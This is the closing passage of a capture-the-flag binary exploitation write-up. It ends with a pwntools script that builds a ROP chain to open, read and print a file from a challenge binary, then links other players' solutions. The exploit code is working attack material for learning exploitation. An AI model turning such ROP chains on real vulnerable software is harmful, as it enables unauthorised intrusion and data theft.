payload += p64(pop_rdi) + p64(leak)
payload += p64(pop_rsi) + p64(constants.O_RDONLY)
payload += p64(open_plt)
##### set rbp to resume execution of payload #####
payload += p64(pop_rbp)
payload += p64(leak + len(payload) + 8)
################# set rdx to 0x54 ################
payload += p64(rdx_to_0x54)
###################### read ######################
payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi)
payload += p64(leak + 240)
payload += p64(read_plt)
###################### puts ######################
payload += p64(pop_rdi)
payload += p64(leak + 240)
payload += p64(puts_plt)

# gdb.attach(p, gdbscript='''
# 	b* finale+111
# 	''')
# pause()

print("Sending payload ...")
p.sendline(payload)
p.interactive()
```

**Goomba#5154 had also posted an exploit script, which seemed to use the magic gadget `add dword ptr [rbp - 0x3d], ebx ; nop ; ret`. I've heard that it's an insanely cool technique, but I couldn't fully understand how it works, I'm looking forward to learning it now.**  
But it seems to be beyond my skill level. So I'll just leave these references if you are interested:  
https://roderickchan.github.io/2022/10/03/2022-sekai-pwn-wp-gets-bfs/  
https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/pwn/gets/solution  
https://www.cnblogs.com/ZIKH26/articles/16193814.html  
